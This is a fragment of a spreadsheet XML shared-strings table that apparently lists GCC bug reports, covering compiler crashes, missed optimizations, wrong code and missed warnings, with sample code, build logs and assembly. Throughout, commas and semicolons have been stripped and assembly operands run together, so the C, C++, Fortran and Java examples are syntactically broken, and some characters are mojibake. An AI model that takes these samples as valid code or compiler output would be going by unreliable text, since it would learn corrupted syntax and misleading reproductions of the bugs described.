I think the program is valid due to the default initializer it should print 2 (as it does with g95 NAG f95 ifort openf95) but gfortran prints 4.
The problem looks similar to PR31205 in so far that gfortran did the initialization in the caller and not in the called procedure.
Dump:
set (x1) {  (void) 0 }
d.i = 4
set (
program test
  implicit none
  type data_type
    integer :: i=2
  end type data_type
  type(data_type) :: d
  d%i = 4
  call set(d)
  print * d%i
contains
  subroutine set(x1)
    type(data_type)intent(out):: x1
  end subroutine set
end program test</t>
  </si>
  <si>
    <t>GCC-20643</t>
  </si>
  <si>
    <t>[4.2 Regression] Tree loop optimizer does worse job than RTL loop optimizer</t>
  </si>
  <si>
    <t>In the attached test case 3.4.* GCC generates better code than 4.0 (or 4.1)
because it moves more loop invariant code out of the inner loop of P7Viterbi. 
The problem seems to be in the alias analysis which determines what can be moved
out of that loop.  If you change the field M which is unused from int to float
then the 4.* GCC generates better code.  I tried the structure-alias branch to
see if that helped and it didn't.  See the email string starting at
http://gcc.gnu.org/ml/gcc/2005-03/msg00835.html for some more info.
Test case:
#define L_CONST 500
void *malloc(long size)
struct plan7_s {
  int M
  int **tsc                   /* transition scores     [0.6][1.M-1]        */
}
struct dpmatrix_s {
  int **mmx
}
struct dpmatrix_s *mx
void
AllocPlan7Body(struct plan7_s *hmm int M) 
{
  int i
  hmm-&gt;tsc    = malloc (7 * sizeof(int *))
  hmm-&gt;tsc[0] = malloc ((M+16) * sizeof(int))
  mx-&gt;mmx = (int **) malloc(sizeof(int *) * (L_CONST+1))
  for (i = 0 i &lt;= L_CONST i++) {
    mx-&gt;mmx[i] = malloc (M+2+16)
  }
  return
}  
void
P7Viterbi(int L int M struct plan7_s *hmm int **mmx)
{
  int   ik
  for (i = 1 i &lt;= L i++) {
    for (k = 1 k &lt;= M k++) {
      mmx[i][k] = mmx[i-1][k-1] + hmm-&gt;tsc[0][k-1]
    }
  }
}
main ()
{
	struct plan7_s *hmm
	char dsq[L_CONST]
        int i
	hmm = (struct plan7_s *) malloc (sizeof (struct plan7_s))
	mx = (struct dpmatrix_s *) malloc (sizeof (struct dpmatrix_s))
	AllocPlan7Body(hmm 10)
        for (i = 0 i &lt; 600000 i++) {
                P7Viterbi(500 10 hmm mx-&gt;mmx)
        }
}</t>
  </si>
  <si>
    <t>GCC-43971</t>
  </si>
  <si>
    <t>[4.6 Regression] index domain error in tree-ssa-structalias.c:3450</t>
  </si>
  <si>
    <t>I just tried to compile the Linux kernel version linux-2.6.34-rc6
with the C compiler version 4.6 snapshot 20100501 and it said
init/main.c: In function 'do_one_initcall':
init/main.c:915:1: internal compiler error: vector VEC(ce_sbase) index domain error in do_structure_copy at tree-ssa-structalias.c:3450
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flags -fno-delete-null-pointer-checks -Os required.</t>
  </si>
  <si>
    <t>GCC-236</t>
  </si>
  <si>
    <t>GCC hangs</t>
  </si>
  <si>
    <t>Whenever I try to actually compile a file with GCC the compiler hangs in DOS mode (Windows reports an illegal instruction no interrupt active). Simple GCC services like GCC -v can be executed and files can be compiled on an Intel 80486 computer so I suspect that there is some kind of incompatibility in the Pentium III instruction set.
Release:
2.95.2 19991024
Environment:
Windows 98 4.10.1998 Intel Pentium III 500 MMX 256 MB RAM
DJGPP installed in C:\DJGPP
How-To-Repeat:
Simply start GCC with a source file to compile</t>
  </si>
  <si>
    <t>tolf</t>
  </si>
  <si>
    <t>GCC-665</t>
  </si>
  <si>
    <t>gcc list archives for Jan 1999 still broken</t>
  </si>
  <si>
    <t>As I previously reported to gcc-bugs back in April and still the case:
	The gcc list archives for January 1999
	(http://gcc.gnu.org/ml/gcc/1999-01n/) are broken.  Note the lack of any
	messages listed that month from before 20 January and the inclusion of
	some messages from February 2000 and March 1998.
The strange dates may be due to broken clocks (perhaps regeneration
should list dates according to when the message arrived at the GCC
server instead of the Date header) and aren't that important but the
lack of messages for much of January should be fixed.  (The FTP
archive for that month seems to have the same problem.)
Release:
unknown
Environment:
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-20577</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] iter_swap doesn't work anymore with vector</t>
  </si>
  <si>
    <t>Just to keep track of this issue:
  http://gcc.gnu.org/ml/libstdc++/2005-03/msg00144.html</t>
  </si>
  <si>
    <t>GCC-9018</t>
  </si>
  <si>
    <t>Some .jar files fail to compile due to bugs in the exception table</t>
  </si>
  <si>
    <t>I have a jar from www.serialio.com that I want to use when I try to compile it I get errors.
Version: 
Reading specs from c:/mingw/bin/../lib/gcc-lib/mingw32/3.2/specs
Reading specs from c:/mingw/bin/../lib/gcc-lib/mingw32/3.2/../../../libgcj.spec
rename spec lib to liborig
Configured with: /extra/src/gcc/gcc-3.2/configure --prefix=/extra/wingcc --build=i686-pc-linux-gnu --host=mingw32 --target=mingw32 --enable-languages=cc++java --with-gcc --with-gnu-as --with-gnu-ld --with-as=/extra/xgcc/bin/mingw32-as --with-ld=/extra/xgcc/bin/mingw32-ld --enable-threads=win32 --disable-nls --disable-win32-registry --disable-shared --disable-debug --disable-multilib --without-newlib --enable-libgcj --disable-java-awt --without-x --enable-java-gc=boehm --disable-libgcj-debug --enable-interpreter --enable-hash-synchronization
Thread model: win32
gcc version 3.2 (mingw special 20020817-1)
Release:
gcj 3.2 from MinGW
How-To-Repeat:
1. run the command line below
gcj -fjni -shared -o serialio.dll Serialio.jar
2. You get these errors(no errors/warnings and 
Serialio/modem/Modem.java: In class `Serialio.modem.Modem':
Serialio/modem/Modem.java: In method `Serialio.modem.Modem.getRequest()':
Serialio/modem/Modem.java:300: bad pc in exception_table
Serialio/modem/Modem.java: In method `Serialio.modem.Modem.request(int)':
Serialio/modem/Modem.java:326: bad pc in exception_table
Serialio/SerialPortLocal.java: In class `Serialio.SerialPortLocal':
Serialio/SerialPortLocal.java: In method `Serialio.SerialPortLocal.open()':
Serialio/SerialPortLocal.java:265: bad pc in exception_table
Serialio/SerialPortLocal.java: In method `Serialio.SerialPortLocal.close()':
Serialio/SerialPortLocal.java:416: bad pc in exception_table
Serialio/SerialPortLocal.java: In method `Serialio.SerialPortLocal.reset()':
Serialio/SerialPortLocal.java:435: bad pc in exception_table
Serialio/SerialPortLocal.java: In method `Serialio.SerialPortLocal.checkBusy(int)':
Serialio/SerialPortLocal.java:461: bad pc in exception_table
Serialio/SerialPortLocal.java: In method `Serialio.SerialPortLocal.setPowerMode(intint)':
Serialio/SerialPortLocal.java:1107: bad pc in exception_table
Serialio/SerialPortLocal.java: In method `Serialio.SerialPortLocal.getPowerMode(int)':
Serialio/SerialPortLocal.java:1128: bad pc in exception_table</t>
  </si>
  <si>
    <t>GCC-8473</t>
  </si>
  <si>
    <t>syntax error on anonymous array subscript</t>
  </si>
  <si>
    <t>This fails although it is accepted by javac:
 cat AnonymousArrayAccess.java
class AnonymousArrayAccess {
  void f() {
    Object o = new Object[]{}[0]
  }
}
 gcj AnonymousArrayAccess.java
AnonymousArrayAccess.java:3: '' expected.
       Object o = new Object[]{}[0]
                                ^
1 error
Release:
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
How-To-Repeat:
See above.</t>
  </si>
  <si>
    <t>GCC-59165</t>
  </si>
  <si>
    <t>gcc looks up begin() end() for for-range loops for ints in namespace std</t>
  </si>
  <si>
    <t>This compiles but shouldn't:
$ cat gcc4.8bug.cc 
// builds with gcc4.8 but shouldn't
namespace std {
int* begin(int i) { return (int*)0 }
int* end(int i) { return (int*)0 }
}
int main() {
  for (int a : 10) { }
}
$ gcc-4.8.1 -c gcc4.8bug.cc  -std=c++11
# works
The standard says that begin() and end() for foreach loops should be looked up in the associated namespace of the type of the expression (6.5.4p1)
otherwise begin-expr and end-expr are begin(__range) and end(__range) respectively where begin and end are looked up in the associated namespaces (3.4.2). [ Note: Ordinary unqualiï¬ed lookup (3.4.1) is not performed. â€” end note ]
10 has type int which is a fundamental type and hence doesn't have an associated namespace. So this shouldn't compile. (It doesn't compile in clang.)
$ gcc-4.8.1 --version
gcc-4.8.1 (GCC) 4.8.1
Copyright (C) 2013 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>thakis</t>
  </si>
  <si>
    <t>GCC-49831</t>
  </si>
  <si>
    <t>arm-linux-gnueabi bootstrap failures due to ICE in dwarf2cfi.c connect_traces</t>
  </si>
  <si>
    <t>Split out from PR 49872 #c2.
The ARM failure is due to non-reachability of the constant pool.</t>
  </si>
  <si>
    <t>GCC-43870</t>
  </si>
  <si>
    <t>ICE in gcc/config/soft-fp/divtf3.c</t>
  </si>
  <si>
    <t>Bootstrapping 4.5.0 fails with ICE in stage1.
Env/tools:
LD_LIBRARY_PATH=/opt/csw/lib
gcc 4.3.4
gas 2.19.1
mpfr 2.4.2
gmp 5.0.1
mpc 0.8.1
Build was configured as:
$ ~/source/gcc-4.5.0/configure --prefix=/usr/tgcware/gcc-4.5.0 --with-local-prefix=/usr/tgcware/gcc-4.5.0 --with-gnu-as --with-as=/opt/csw/bin/gas --without-gnu-ld --with-ld=/usr/ccs/bin/ld --enable-threads=posix --enable-shared --with-gmp=/opt/csw --with-mpfr=/opt/csw --with-mpc=/opt/csw --disable-nsl --with-x --enable-java-awt=xlib --with-system-zlib --enable-languages=cadac++fortranjavaobjcobj-c++
Build failure:
/export/home/tgc/build/gcc450_all_native/./gcc/xgcc -B/export/home/tgc/build/gcc450_all_native/./gcc/ -B/usr/tgcware/gcc-4.5.0/i386-pc-solaris2.8
/bin/ -B/usr/tgcware/gcc-4.5.0/i386-pc-solaris2.8/lib/ -isystem /usr/tgcware/gcc-4.5.0/i386-pc-solaris2.8/include -isystem /usr/tgcware/gcc-4.5.0
/i386-pc-solaris2.8/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -W
old-style-definition  -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/export/ho
me/tgc/source/gcc-4.5.0/libgcc -I/export/home/tgc/source/gcc-4.5.0/libgcc/. -I/export/home/tgc/source/gcc-4.5.0/libgcc/../gcc -I/export/home/tgc/
source/gcc-4.5.0/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -Wno-missing-prototypes -Wno-type-limits -o divtf3.o -MT divtf3.o -MD -MP -MF divt
f3.dep -fexceptions -c /export/home/tgc/source/gcc-4.5.0/libgcc/../gcc/config/soft-fp/divtf3.c
/export/home/tgc/source/gcc-4.5.0/libgcc/../gcc/config/soft-fp/divtf3.c: In function '__divtf3':
/export/home/tgc/source/gcc-4.5.0/libgcc/../gcc/config/soft-fp/divtf3.c:38:1: warning: 'R_e' may be used uninitialized in this function
/export/home/tgc/source/gcc-4.5.0/libgcc/../gcc/config/soft-fp/divtf3.c:49:1: internal compiler error: Segmentation Fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[3]: *** [divtf3.o] Error 1
gmake[3]: Leaving directory `/export/home/tgc/build/gcc450_all_native/i386-pc-solaris2.8/libgcc'
gmake[2]: *** [all-stage1-target-libgcc] Error 2
gmake[2]: Leaving directory `/export/home/tgc/build/gcc450_all_native'
gmake[1]: *** [stage1-bubble] Error 2
gmake[1]: Leaving directory `/export/home/tgc/build/gcc450_all_native'
gmake: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>gcc-tgc</t>
  </si>
  <si>
    <t>GCC-60703</t>
  </si>
  <si>
    <t>System.Address not preelaborable on MIPS</t>
  </si>
  <si>
    <t>Created attachment 32483
demonstrate bug (fails compilation on MIPS)
== Summary ==
The type System.Address does not support preelaborable initialization on the MIPS architecture. As a result compilation of a preelaborated package fails if it contains a variable of type System.Address.
On other architectures (i386 amd64) the same source code compiles succesfully.
I know very little about Ada but I believe that the language specifies that System.Address must have pragma Preelaborable_Initialization in Ada2005.
http://www.adaic.org/resources/add_content/standards/05rat/html/Rat-7-7.html
== Command and error message ==
joris@qmips:~/q gnatmake -gnat05 a.ads
gcc-4.8 -c -gnat05 a.ads
a.ads:7:05: private object not allowed in preelaborated unit
a.ads:7:05: would be legal if pragma Preelaborable_Initialization given for Address at system.ads:64
gnatmake: a.ads compilation error
Source file a.ads attached.
Contents of line 7: hello: System.Address
== Possible cause ==
Looking at the GCC source gcc-4.8.2/gcc/ada/system-linux-mips.ads I notice that it does not contain a pragma Preelaborable_Initialization while for example system-linux-x86.ads does contain that pragma.
Although I only tested with GCC 4.8.2 a casual look in GCC SVN suggests that this problem still exists in the latest version.
== Version ==
joris@qmips:~ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/mips-linux-gnu/4.8/lto-wrapper
Target: mips-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.8.2-16' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-libmudflap --disable-libitm --disable-libsanitizer --disable-libquadmath --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-mips/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-mips --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-mips --with-arch-directory=mips --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-multiarch --with-arch-32=mips2 --with-tune-32=mips32 --enable-targets=all --with-arch-64=mips3 --with-tune-64=mips64 --enable-checking=release --build=mips-linux-gnu --host=mips-linux-gnu --target=mips-linux-gnu
Thread model: posix
gcc version 4.8.2 (Debian 4.8.2-16)</t>
  </si>
  <si>
    <t>jnrhp24</t>
  </si>
  <si>
    <t>GCC-55034</t>
  </si>
  <si>
    <t>avr.c:2877:7: error: variable â€˜regno_destâ€™ set but not used</t>
  </si>
  <si>
    <t>g++ -c   -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber -I../../../gcc/gcc/../libbacktrace    \
        ../../../gcc/gcc/config/avr/avr.c -o avr.o
../../../gcc/gcc/config/avr/avr.c: In function â€˜const char* avr_out_lpm(rtx rtx_def** int*)â€™:
../../../gcc/gcc/config/avr/avr.c:2877:7: error: variable â€˜regno_destâ€™ set but not used [-Werror=unused-but-set-variable]
   int regno_dest
       ^
cc1plus: all warnings being treated as errors
make[2]: *** [avr.o] Error 1</t>
  </si>
  <si>
    <t>GCC-47558</t>
  </si>
  <si>
    <t>163267 breaks exception traceback in xplor-nih</t>
  </si>
  <si>
    <t>The commit...
r163267 | iains | 2010-08-15 15:15:55 -0400 (Sun 15 Aug 2010) | 7 lines
rationalize libgcc stub &amp; static lib linkage on Darwin 9 &amp; 10.
        * config/darwin.h (REAL_LIBGCC_SPEC): Remove libgcc_s.10.5 stub for 
        Darwin10.  Do not link libgcc.a for Darwin &gt;= 9.
breaks the exception traceback in xplor-nih on x86_64-apple-darwin such that
the dipCoup.inp test in xplor-nih fails with...
 -------------------------------------------------------------------------------
 -- POWELL ------ step=      5 --- stepsize=  0.020455 --- energy evals=    2 --
 | Etotal =181.583    grad(E)=4.894      E(BOND)=6.068      E(ANGL)=160.218    |
 | E(IMPR)=5.596      E(XDIP)=9.701                                            |
 -------------------------------------------------------------------------------
Powell::step: irregular exit: Line search abandoned: gradient may be incorrect
../bin/xplor: line 499:  6658 Abort trap              /Users/howarth/xplor-nih-2.27/bin.Darwin_10_x86_64/xplor
This failure occurs in gcc 4.6 from r163267 including current gcc trunk. I notice that from this revision
forward the linkages in the xplor-nih build show changes of the form...
 libintVar.dylib:
@@ -2114 +1912 @@
 	/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.dylib (compatibility version 1.0.0 current version 219.0.0)
 	/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib (compatibility version 1.0.0 current version 219.0.0)
 	/Users/howarth/dist/lib/libstdc++.6.dylib (compatibility version 7.0.0 current version 7.15.0)
-	/usr/lib/libgcc_s.1.dylib (compatibility version 1.0.0 current version 625.0.0)
 	/Users/howarth/dist/lib/libgcc_s.1.dylib (compatibility version 1.0.0 current version 1.0.0)
 	/usr/lib/libSystem.B.dylib (compatibility version 1.0.0 current version 125.2.1)</t>
  </si>
  <si>
    <t>GCC-5220</t>
  </si>
  <si>
    <t>FWD: Re: Your Message Sent on Sat 29 Dec 2001 16:28:56 -0500</t>
  </si>
  <si>
    <t xml:space="preserve"> ---------- Original Message ----------------------------------
 From: Bjarne Stroustrup 
 Reply-To: Bjarne Stroustrup 
 Date:  Sat 29 Dec 2001 16:51:06 -0500 (EST)
 &gt;Date: Sat 29 Dec 2001 16:28:56 -0500
 &gt;Mime-Version: 1.0
 &gt;From: Jeffrey Turner 
 &gt;To: 
 &gt;
 &gt;Dear Mr. Stroustrup
 &gt;
 &gt;This question came up recently on a gcc mailing list.
 &gt;Is there a C++ way to cast something to a void?
 &gt;Gcc will reasonably enough give a warning for
 &gt;
 &gt;     (void) foo
 &gt;
 &gt;if -Wold-style-casts is in the command-line.
 &gt;Can it be done with s?
 Sure:
 	static_cast(e)
 is ok for any valid expression e. (standard 5.2.9[4])
 &gt;Thanks again
 &gt;
 &gt;--Jeff Turner
 &gt;
 &gt;Who put the Sam in the 'Sama Laden Ding-Dong?
 &gt;                 
 	- Bjarne
 Bjarne Stroustrup http://www.research.att.com/~bs
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-58139</t>
  </si>
  <si>
    <t>PowerPC volatile VSX register live across call</t>
  </si>
  <si>
    <t>void tightness3_intrinsics2(double* A double* B int N) {
 __vector double * vA = (__vector double*)A
 __vector double * vB = (__vector double*)B
 __vector double va0 va1
 double b0 b1 b2 b3
 va0 = vA[0]
 va1 = vA[1]
 b0 = log(vec_extract(va0 0))
 b1 = log(vec_extract(va0 1))
 b2 = log(vec_extract(va1 0))
 b3 = log(vec_extract(va1 1))
 __vector double vb0 = {b0 b1}
 __vector double vb1 = {b2 b3}
 vB[0] = vb0
 vB[1] = vb1
}
         xxpermdi 163632
         xxpermdi 3030290
         bl log
         nop
         addi 11192
         li 0-80
         stxvd2x 30030
GCC should not expect VSX 30 to be preserved across the call to log().</t>
  </si>
  <si>
    <t>GCC-78944</t>
  </si>
  <si>
    <t>demangler</t>
  </si>
  <si>
    <t>null pointer in demangler</t>
  </si>
  <si>
    <t>Demangling the name _Z3fooAv32pM causes null pointer dereferencing:
$ valgrind c++filt _Z3fooAv32pM
==11277== Memcheck a memory error detector
==11277== Copyright (C) 2002-2015 and GNU GPL'd by Julian Seward et al.
==11277== Using Valgrind-3.11.0 and LibVEX rerun with -h for copyright info
==11277== Command: c++filt _Z3fooAv32pM
==11277== 
==11277== Invalid read of size 1
==11277==    at 0x4F140D9: d_expression_1 (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x4F13091: cplus_demangle_type (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x4F13387: d_parmlist (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x4F137FF: d_bare_function_type (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x4F14E80: d_encoding (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x4F1534B: cplus_demangle_mangled_name (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x4F1597A: d_demangle_callback (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x4F15AE8: d_demangle (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x4F15C3D: cplus_demangle_v3 (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x4F07153: cplus_demangle (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/lib/libbfd-2.26.20160125.so)
==11277==    by 0x402293: demangle_it (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/bin/c++filt)
==11277==    by 0x401F2C: main (in /nix/store/bxzwd8nb1jjdh9fcqpii4x7r4gl2s8qb-binutils-2.26/bin/c++filt)
==11277==  Address 0x0 is not stack'd malloc'd or (recently) free'd</t>
  </si>
  <si>
    <t>GCC-23811</t>
  </si>
  <si>
    <t>returning 64-bit value turns off some 32-bit optimizations</t>
  </si>
  <si>
    <t>The function below compiled with -O9 -fomit-frame-pointer fails to optimize the final 16-bit swap 
into an x86 roll instruction *if* the return type is uint64_t.  If the return type is uint32_t a roll 
instruction is generated and the resulting code is 6 instructions (19 bytes) shorter.  All of the math in 
the function is done in 32-bit unsigned values so ideally the only effect of setting the return type to 
uint64_t should be that the compiler arranges for %edx to be zero at the end.
typedef unsigned long long uint64_t
typedef unsigned long uint32_t
#define REV32STEP(VAR SHIFT MASK) \
  VAR = (((VAR &gt;&gt; SHIFT) &amp; MASK) | ((VAR &lt;&lt; SHIFT) &amp; (0xFFFFFFFFUL &amp; ~MASK)))
uint64_t bitreverse2 (uint32_t n) {
  uint32_t lower = n
  REV32STEP(lower  1 0x55555555UL) /* odd/even bits */
  REV32STEP(lower  2 0x33333333UL) /* bitpairs */
  REV32STEP(lower  4 0x0F0F0F0FUL) /* nibbles */
  REV32STEP(lower  8 0x00FF00FFUL) /* bytes */
  REV32STEP(lower 16 0x0000FFFFUL) /* halfwords */
  return lower
}
64-bit version:
bitreverse2:
        movl    4(%esp) %edx
        movl    %edx %eax
        addl    %edx %edx
        shrl    %eax
        andl    $-1431655766 %edx
        andl    $1431655765 %eax
        orl     %edx %eax
        movl    %eax %edx
        shrl    $2 %edx
        sall    $2 %eax
        andl    $858993459 %edx
        andl    $-858993460 %eax
        orl     %eax %edx
        movl    %edx %eax
        shrl    $4 %eax
        sall    $4 %edx
        andl    $252645135 %eax
        andl    $-252645136 %edx
        orl     %edx %eax
        xorl    %edx %edx   # &lt;- edx is cleared here
        movl    %eax %ecx
        shrl    $8 %ecx
        sall    $8 %eax
        andl    $16711935 %ecx
        andl    $-16711936 %eax
        orl     %eax %ecx
        # final swap starts here
        movl    %ecx %eax
        shrl    $16 %eax
        sall    $16 %ecx
        andl    $65535 %eax    # &lt;- redundant after shift
        andl    $-65536 %ecx  # &lt;- redundant after shift
        orl     %ecx %eax
        ret
32-bit version:
bitreverse2:
        movl    4(%esp) %edx
        movl    %edx %eax
        addl    %edx %edx
        shrl    %eax
        andl    $-1431655766 %edx
        andl    $1431655765 %eax
        orl     %edx %eax
        movl    %eax %edx
        shrl    $2 %edx
        sall    $2 %eax
        andl    $858993459 %edx
        andl    $-858993460 %eax
        orl     %eax %edx
        movl    %edx %ecx
        shrl    $4 %ecx
        sall    $4 %edx
        andl    $252645135 %ecx
        andl    $-252645136 %edx
        orl     %edx %ecx
        movl    %ecx %eax
        shrl    $8 %eax
        sall    $8 %ecx
        andl    $16711935 %eax
        andl    $-16711936 %ecx
        orl     %ecx %eax
        roll    $16 %eax     # &lt;- final swap
        ret
This is with compiler sources from CVS as of about 6AM this morning US/Eastern.</t>
  </si>
  <si>
    <t>raeburn</t>
  </si>
  <si>
    <t>GCC-79345</t>
  </si>
  <si>
    <t>[6 Regression] passing yet-uninitialized member as argument to base class constructor should warn (-Wunitialized)</t>
  </si>
  <si>
    <t>Created attachment 40653
test source
Using g++ 7.0.1 20170202 (trunk) compiling this code:
==============
#include 
struct ui_file {}
ui_file stream_v stream_q
struct gdb_disassembler
{
  gdb_disassembler (struct ui_file *file) : m_stream (file) {}
  struct ui_file *m_stream
}
/* Test disassembly of one instruction.  */
struct gdb_disassembler_test : public gdb_disassembler
{
  const bool verbose = false
  gdb_disassembler_test ()
    : gdb_disassembler (verbose ? &amp;stream_v : &amp;stream_q) // bug here
  {}
  void use_stream ()
}
void
func ()
{
  gdb_disassembler_test di
  di.use_stream ()
}
====
with:
 g++ -std=gnu++11 uninitialized.cc -c -o uninitialized -O2
does not produce any warning.  However the member initializer here at:
  gdb_disassembler_test ()
    : gdb_disassembler (verbose ? &amp;stream_v : &amp;stream_q) // bug here
  {}
is passing the yet-uninitialized gdb_disassembler_test::verbose to the
gdb_disassembler ctor.  This is a bug because even though the verbose field has an in-class initializer base classes are initialized before members of the current class are initialized.
The frontend end obviously must know this so it should be able to detect the bug and warn regardless of optimization level.  (At least when passing by value.  Passing by reference/pointer may have legitimate uses.)
(TBC g++ does not warn at any optimization level.)
Looks like a regression.  I tried:
   g++ 7.0.1 20170202 (trunk)
   g++ 5.3.1 (Fedora 23)
   g++ 4.8.5
   g++ 4.7.4
   clang++ 3.7
All but g++ 7 warned at -O2.  None warned at -O0.
clang++ manages to warn even at -O0.
g++ 5.3.1 (-O2):
$ g++ -std=gnu++11 -O2 -Wall -Wextra -Wuninitialized gcc-bug.cc -c -o gcc-bug
gcc-bug.cc: In function â€˜void func()â€™:
gcc-bug.cc:19:25: warning: â€˜di.gdb_disassembler_test::verboseâ€™ is used uninitialized in this function [-Wuninitialized]
     : gdb_disassembler (verbose ? &amp;stream_v : &amp;stream_q) // bug here
                         ^
gcc-bug.cc:28:25: note: â€˜diâ€™ was declared here
   gdb_disassembler_test di
                         ^
g++ 4.7 (-O2):
$ /opt/gcc-4.7/bin/g++ -std=gnu++11 -O2 -Wall -Wextra -Wuninitialized gcc-bug.cc -c -o gcc-bug
gcc-bug.cc: In function â€˜void func()â€™:
gcc-bug.cc:19:56: warning: â€˜di.gdb_disassembler_test::verboseâ€™ is used uninitialized in this function [-Wuninitialized]
gcc-bug.cc:28:25: note: â€˜diâ€™ was declared here
clang++ (-O0):
$ clang++ -std=gnu++11 -O0 -Wall -Wextra -Wuninitialized gcc-bug.cc -c -o gcc-bug
gcc-bug.cc:19:25: warning: field 'verbose' is uninitialized when used here [-Wuninitialized]
    : gdb_disassembler (verbose ? &amp;stream_v : &amp;stream_q) // bug here
                        ^
1 warning generated.</t>
  </si>
  <si>
    <t>palves</t>
  </si>
  <si>
    <t>GCC-4714</t>
  </si>
  <si>
    <t>Haney's real matrix performance regression</t>
  </si>
  <si>
    <t>Since October 24th gcc3.1 snapshots are not able anymore
to optimize well the O-O C++ version of the Real Matrix
test in the Haney suite (
ftp://ftp.kai.com/pub/benchmarks/haney_1p5.tar.gz)
This is the mis-optimized triple loop:
////////////////
class RealMatrix {
public:
  float &amp;index(int i int j)
    {
      return d[i - 1 + n[0] * (j - 1)]
    }
  float index(int i int j) const
    {
      return d[i - 1 + n[0] * (j - 1)]
    }
  int dim(int i) const { return n[i - 1] }
private:
  float *d
  int n[4]
}
void rmatMul(RealMatrix &amp;t const RealMatrix &amp;a
const RealMatrix &amp;b)
{
  const int M = a.dim(1) N = b.dim(2) K = b.dim(1)
  for (int j = 1 j &lt;= N j++)
    {
      for (int k = 1 k &lt;= K k++)
        {
          float temp = b.index(k j)
          if (temp != 0.0)
            {
              for (int i = 1 i &lt;= M i++)
                t.index(i j) += temp * a.index(i k)
            }
        }
    }
}
////////////////
If you compile it at -O2 on i686 you ends up with the
following assembler for the innermost loop:
  80:   8b 4d 08                mov    0x8(%ebp)%ecx
  83:   d9 c0                   fld    %st(0)
  85:   8b 75 0c                mov    0xc(%ebp)%esi
  88:   8b 51 04                mov    0x4(%ecx)%edx
  8b:   8b 01                   mov    (%ecx)%eax
  8d:   8b 4e 04                mov    0x4(%esi)%ecx
  90:   0f af d7                imul   %edi%edx
  93:   8d 14 1a                lea    (%edx%ebx1)%edx
  96:   8d 14 90                lea    (%eax%edx4)%edx
  99:   8b 45 dc                mov    0xffffffdc(%ebp)%eax
  9c:   0f af c1                imul   %ecx%eax
  9f:   8b 0e                   mov    (%esi)%ecx
  a1:   8d 04 18                lea    (%eax%ebx1)%eax
  a4:   43                      inc    %ebx
  a5:   d8 4c 81 fc             fmuls  0xfffffffc(%ecx%eax4)
  a9:   3b 5d f0                cmp    0xfffffff0(%ebp)%ebx
